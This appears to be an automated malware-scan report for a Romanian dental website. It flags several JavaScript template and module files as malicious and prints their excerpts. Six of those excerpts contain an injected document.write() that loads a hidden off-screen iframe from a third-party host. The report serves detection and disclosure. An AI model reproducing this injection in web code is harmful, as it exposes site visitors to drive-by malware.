Scanned pages/files
Request | Server response | Status |
http://dentina.ro/ | 200 OK Content-Length: 20946 Content-Type: text/html | clean |
http://dentina.ro/media/system/js/caption.js | 403 Forbidden Content-Length: 347 Content-Type: text/html | clean |
http://dentina.ro/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://dentina.ro/templates/yoo_royalplaza/lib/js/addons/base.js | 200 OK Content-Length: 1951 Content-Type: application/javascript | malicious |
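Malicious code - confirmed by antiviruses (see below). The excerpt is truncated mid-string. The part that stands out is the trailing document.write() call, which writes an iframe positioned off-screen (left:-550px) whose src points to a third-party host. The packed eval(function(p,a,c,k,e,d){...}) block before it appears to be the template's own packed script, not the injection. The same trailing statement appears in the excerpts of the other flagged .js files on this page; the yoo_effects.js.php excerpt does not show it.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 1q={1m:5(y,n){3 7=0;$$(y).b(5(4,i){3 8;9(4.C){8=4.C}M 9(4.m.z){8=4.m.z}7=G.7(7,8)});9(n!=1f){7=G.7(7,n)}$$(y).b(5(4,i){3 B=4.k(\'F-E\').o()+4.k(\'F-L\').o()+4.k(\ ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>');
Antivirus reports: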
| ||
http://dentina.ro/templates/yoo_royalplaza/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 1531 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 x=7 E({F:4(j,n,3){0.J({r:\'p\',K:4(2){2.m(\'5\');2.g().m(\'5\')},H:4(2){2.l(\'5\');2.g().l(\'5\')}},3);0.8=j;0.b=n;A(0.3.r){B\'C\':0.q();D;p:0.s()}},s:4(){6 3={}; ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/templates/yoo_royalplaza/lib/js/addons/fancymenu.js | 200 OK Content-Length: 2847 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('f 1a=d z({1y:9(e,6){4.M({1v:1s.1n.1z,R:1p,1q:o,1g:z.P,14:z.P,1c:z.P,h:1,g:\'r\',1b:1t,Y:\'L.1m\',X:\'L.12\',Z:\'7.1j\'},6);b(!$(e))T;f U=0;4.e=$(e);4.8=[];4.7=[];4. ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/templates/yoo_royalplaza/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 3004 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('8 17=f 1x({1w:4(5,9){1.1v({P:\'1y\',Z:\'1h\',V:\'1z\',1C:1u,X:1A,q:\'m\',1D:u.1s.1o,1n:Y},9);8 a=1;1.d=$(5);1.D=1t;1.E=[];1.m=[];i(!1.d)1p;1.d.U({S:4(n){a.m=[];a.B( ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/templates/yoo_royalplaza/lib/js/template.js | 200 OK Content-Length: 2779 Content-Type: application/javascript | clean |
http://dentina.ro/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK Content-Length: 2922 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('C I=h n({1r:5(d,3){2.o({1b:n.t,Y:n.t,1l:n.t,11:n.t,10:\'.s\',13:\'.1g\',17:\'.a\',16:\'.a-6\',Z:\'.a-1s\',X:1q,1j:1t,z:\'x\',K:0,D:\'1u\',N:\'1v\',M:\'19\',k:1p,9:\ ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 3752 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 1B=2 1E({1v:5(t,4){1.1w({1h:\'c...\',16:\'Y\',13:\'1U.1V\',18:\'1T.c-9\',17:\'h.f\',1j:\'15 e\',1g:\'15 A\',1m:\'1P e 1Q\',1G:\'1R e\',m:\'1W.1X?22=23&21=20&a ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 35274 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is cut off after the opening of the Shadowbox MooTools adapter, so the portion of this 35274-byte response that triggered the detection is not visible here.
if(typeof MooTools=="undefined"){throw"Unable to load Shadowbox, MooTools library not found."}var Shadowbox={};Shadowbox.lib={getStyle:function(B,A){return $(B).getStyle(A)},setStyle:function(D,C,E){D=$(D);if(typeof C!="object"){var A={};A[C]=E;C=A}for(var B in C){D.setStyle(B,C[B])}},get:function(A){return $(A)},remove:function(A){A.parentNode.removeChild(A)},getTarget:function(A){return A.target||{}},preventDefault:function(A){new Event(A).preventDefault()},addEvent:function(C,A,B){$(C).addEve
Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dentina.ro
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 22 Apr 2014 07:24:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 22 Apr 2014 07:24:10 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f9db3fee11242c199762efda35e03de9=d2c997984f90b14398aca3a94193beca; path=/
X-Powered-By: PHP/5.3.18
GET / HTTP/1.1
Host: dentina.ro
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 22 Apr 2014 07:24:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 22 Apr 2014 07:24:10 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f9db3fee11242c199762efda35e03de9=d2c997984f90b14398aca3a94193beca; path=/
X-Powered-By: PHP/5.3.18
Second query (visit from search engine):
GET / HTTP/1.1
Host: dentina.ro
Referer: http://www.google.com/search?q=dentina.ro
Result:
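The result is similar to the first query. No suspicious redirects were found. This check only compares the server's response with and without a search-engine Referer header; it does not cover the iframe written by the flagged script files listed under "Scanned pages/files".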
GET / HTTP/1.1
Host: dentina.ro
Referer: http://www.google.com/search?q=dentina.ro
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dentina.ro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dentina.ro/
Result: dentina.ro is not infected or malware details are not published yet.
Result: dentina.ro is not infected or malware details are not published yet.